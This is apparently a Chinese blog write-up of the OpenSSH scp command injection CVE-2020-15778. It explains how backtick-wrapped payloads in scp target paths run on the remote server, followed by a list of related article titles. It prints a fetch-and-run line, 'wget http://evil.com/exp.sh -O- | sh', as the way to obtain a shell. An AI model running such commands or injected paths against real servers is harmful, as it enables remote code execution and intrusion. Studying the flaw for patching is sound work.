一、漏洞简介

该漏洞发生于 OpenSSH <= 8.3p1 系统,即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。

利用条件:知道目标的ssh密码

二、漏洞原理

scp是 secure copy的缩写, scp是linux系统下基于ssh登陆进行安全的远程文件拷贝命令。linux的scp命令可以在linux服务器之间复制文件和目录。

scp格式为:

scp SourceFile user@host:directory/TargetFile
scp [参数] [原路径] [目标路径]

scp命令在执行时,会使用”-t“参数来获取存储传入文件的路径,但是未对传入的文件路径进行检测防护:

使用反引号包裹payload然后加上文件名执行scp命令,这时,payload将会发送到远程服务器并执行。

三、漏洞复现

首先,我们向目标机器上传文件。如图,需要输入密码,因此我要重申,这次漏洞还是有点鸡肋。

接着,执行带有payload的scp命令,payload的作用是在目标机器上生成一个sh文件:

查看文件,可以看到创建成功:

这个漏洞可能适用于远程服务器禁用了ssh登录,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。那么攻击者可以使用下列命令获取网站的shell:

wget http://evil.com/exp.sh -O- | sh

四、漏洞防御

先确保ssh密码没有泄露,等一波openssh的新版本吧

[应用漏洞]OpenSSH scp命令注入漏洞(CVE-2020-15778)相关推荐

  1. 最新系统漏洞--QSAN SANOS命令注入漏洞

    最新系统漏洞2021年10月21日 受影响系统: QSAN SANOS <= 2.0.0 (build 202012222000) 描述: CVE(CAN) ID: CVE-2021-32533 ...

  2. 【安全漏洞】Cisco命令注入漏洞CVE-2021-1414分析

    概述 最近关注了Cisco的一个命令注入漏洞CVE-2021-1414,命令注入之后可导致远程代码执行: 漏洞存在于固件版本低于V1.0.03.21的RV340系列路由器中,当前最新版本V1.0.03 ...

  3. 网络安全笔记-OS命令注入漏洞

    OS命令注入漏洞 原理以及成因: 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速.简洁,方便,但是也伴随着一些问题.比如说速度慢,或者无法接触系统底层,如果我们开发应用,特别 ...

  4. openssh漏洞_漏洞预警 | OpenSSH 命令注入漏洞

    0x00  漏洞编号 CVE-2020-15778 0x01 危险等级 高危 0x02 漏洞概述 OpenSSH 8.3 p1及之前版本中的scp的scp.c文件存在命令注入漏洞.该漏洞源于外部输入数 ...

  5. OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)

    一.漏洞概要 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开.OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者 ...

  6. 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)

    OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...

  7. openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)

    本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...

  8. OpenSSH 命令注入漏洞(CVE-2020-15778)

    该漏洞为SCP命令引起 可以禁用scp,改用rsync等缓解风险(可能会导致小文件机器内拷贝变慢) 目前官方最新版openssh仍然存在该漏洞,所以需要卸载scp命令. yum remove open ...

  9. java 漏洞挖掘_Apache Tika命令注入漏洞挖掘

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...

  10. 修改jar 注入_Apache Tika命令注入漏洞挖掘

    介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤.CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335.由于Apache ...

最新文章

  1. Anaconda3 离线安装 Django-3.2.7 及依赖项setuptools、sqlparse 、asgiref、typing_extensions等模块
  2. CNN可视化又添新作,南大开源Group-CAM:高效的显著图生成方法|CVPR2021
  3. ISC 2020技术日丨 网络空间危机四伏,如何发现威胁的蛛丝马迹?
  4. DataGridVidw添加CheckBox。并通过一个 CheckBox来控制其全选。
  5. js变量作用域和变量提升
  6. android中的常用方法,android开发中常用方法总结
  7. 超燃!支付宝技术双11纪录片《一心一役》全球独家首发
  8. python3 Xml操作
  9. PHP强制类型定义数组,php – 如何强制Doctrine更新数组类型字段?
  10. meta你到底了解多少
  11. [渝粤教育] 南京邮电大学 Python语言程序设计基础 参考 资料
  12. 项目集锦 | 易基因DNA羟甲基化5hmC测序研究成果
  13. charles使用的遇到的坑,以及日常使用
  14. Socks5代理Socks5 Proxy
  15. 幻影影音 - 免费的多媒体视频播放器
  16. 用对这30种秘密武器, 你也能成为区块链高手!
  17. 微信小程序生态1-初识小程序
  18. 蓝桥试题 算法提高 使用指针逆序输出 JAVA
  19. 视频教程-【10天企业定制课】2019年PS软件photoshop/CC应用计划学习视频-UI
  20. 注册中心节点摘除问题分析

热门文章

  1. speedoffice(Excel)如何隐藏编辑栏
  2. 中国在计算机领域取得的成就,厉害了我的国——盘点中国科学近年有哪些成就...
  3. P800 GPS 地图安装教程
  4. Linux的nc,局域网文件互传
  5. 费曼:我确信没有人能懂得量子力学
  6. 利用Android SAF(存储访问框架)进行游戏反和谐(伊甸园的骄傲)/Android data目录的访问限制
  7. 高速光通信-调制概述
  8. html5 3d场景设计,三维场景设计是什么_三维场景设计的介绍
  9. x86 x64 IA64的关系和区别
  10. Windows搭建邮件服务器,实现收发邮件(对第三方邮箱,例如QQ邮箱等)